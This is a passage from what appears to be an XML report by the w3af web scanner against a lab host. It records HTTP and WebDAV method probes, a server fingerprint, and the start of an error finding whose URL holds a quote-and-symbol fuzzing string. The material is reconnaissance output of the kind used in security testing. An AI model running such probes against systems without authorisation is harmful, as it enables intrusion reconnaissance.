                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="70">
                <http-request>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="87">
                <http-request>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </http-response>
            </http-transaction>
            <http-transaction id="210">
                <http-request>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="249">
                <http-request>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="252">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="259">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="382">
                <http-request>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="423">
                <http-request>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="457">
                <http-request>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="476">
                <http-request>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="489">
                <http-request>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="530">
                <http-request>
                    <status>MKWORKSPACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="close" field="connection"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="553">
                <http-request>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="580">
                <http-request>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="604">
                <http-request>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="664">
                <http-request>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="682">
                <http-request>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="707">
                <http-request>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="757">
                <http-request>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="822">
                <http-request>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="854">
                <http-request>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[257, 290, 316]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
